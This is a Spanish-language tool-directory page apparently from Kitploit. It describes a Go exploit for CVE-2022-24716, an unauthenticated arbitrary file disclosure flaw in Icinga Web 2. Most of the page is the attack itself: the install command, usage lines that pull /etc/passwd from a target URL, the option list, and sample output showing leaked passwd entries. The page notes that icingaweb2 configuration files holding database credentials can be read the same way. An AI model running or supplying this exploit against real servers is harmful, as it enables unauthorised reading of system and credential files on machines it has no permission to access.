Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-24716-2 — CVE-2022-24716 (Divulgación de archivos arbitrarios en Icingaweb2) | Kitploit
Herramientas/GitHubGitHub/gmh5225/cve-2022-24716-2
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubgmh5225/cve-2022-24716-2

CVE-2022-24716-2

CVE-2022-24716 (Divulgación de archivos arbitrarios en Icingaweb2)

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-24716

Icinga Web 2 es una interfaz web de monitoreo de código abierto, framework e interfaz de línea de comandos. Los usuarios no autenticados pueden filtrar el contenido de archivos locales del sistema accesibles por el usuario desde el servidor web, incluidos los archivos de configuración de icingaweb2 con credenciales de la base de datos.

  • Instalación
  • Uso
  • Ejecución de CVE-2022-24716

Instalación

CVE-2022-24716 requiere golang y para descargarlo solo tienes que usar:

root@kitploit:~
go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Uso

root@kitploit:~
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

Esto mostrará la ayuda de la herramienta. Estas son todas las opciones que admite:

root@kitploit:~
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Ejecución de CVE-2022-24716

root@kitploit:~
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
Descargar herramienta